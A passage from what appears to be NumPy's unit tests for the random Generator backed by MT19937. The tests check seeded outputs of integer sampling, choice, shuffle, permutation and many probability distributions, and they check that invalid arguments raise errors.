(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non symmetric covariance input raises exception when
# check_valid='raises' if using default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov, method=method)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal_basic_stats(self, method):
random = Generator(MT19937(self.seed))
n_s = 1000
mean = np.array([1, 2])
cov = np.array([[2, 1], [1, 2]])
s = random.multivariate_normal(mean, cov, size=(n_s,), method=method)
s_center = s - mean
cov_emp = (s_center.T @ s_center) / (n_s - 1)
# these are pretty loose and are only designed to detect major errors
assert np.all(np.abs(s_center.mean(-2)) < 0.1)
assert np.all(np.abs(cov_emp - cov) < 0.2)
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_negative_binomial_p0_exception(self):
# Verify that p=0 raises an exception.
with assert_raises(ValueError):
x = random.negative_binomial(1, 0)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
